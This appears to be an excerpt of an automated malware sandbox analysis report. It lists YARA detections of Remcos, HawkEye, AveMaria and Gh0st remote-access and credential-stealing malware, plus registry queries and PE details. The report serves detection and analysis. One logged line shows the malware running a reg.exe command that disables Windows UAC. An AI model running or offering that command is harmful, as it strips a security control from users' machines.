                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 3.3.bin.exe.d4d388.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: AveMaria_WarZone Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                    Writes or reads registry keys via WMIShow sources
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_004060431_2_00406043
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_004046181_2_00404618
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_0040681A1_2_0040681A
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDAF5301_2_6EDAF530
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB82341_2_6EDB8234
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB87A61_2_6EDB87A6
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB8F4E1_2_6EDB8F4E
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB3B2E1_2_6EDB3B2E
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDBA3231_2_6EDBA323
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB7CC21_2_6EDB7CC2
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC29F41_2_6EDC29F4
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC29E51_2_6EDC29E5
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDAF5AF1_2_6EDAF5AF
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004231154_2_00423115
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004112344_2_00411234
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004323C04_2_004323C0
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043538A4_2_0043538A
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0042F42A4_2_0042F42A
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043B56C4_2_0043B56C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0041B5374_2_0041B537
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004346414_2_00434641
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0042360C4_2_0042360C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0044C7FB4_2_0044C7FB
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043B79B4_2_0043B79B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004357BF4_2_004357BF
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004528804_2_00452880
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043191B4_2_0043191B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043B9CA4_2_0043B9CA
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0044E9814_2_0044E981
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00434B3D4_2_00434B3D
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00423CAA4_2_00423CAA
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00440D304_2_00440D30
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00423DED4_2_00423DED
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00434F554_2_00434F55
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0044CF194_2_0044CF19
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00419F804_2_00419F80
                    Source: xxTzyGLZx5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: rem9090sta.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: remcos.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Droppertodownloa[1].exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: dwn.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 21.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 4.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Windows Update.exe.40.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.44.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                    Source: sqlite3.dll.39.drStatic PE information: Number of sections : 19 > 10
                    Source: xxTzyGLZx5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
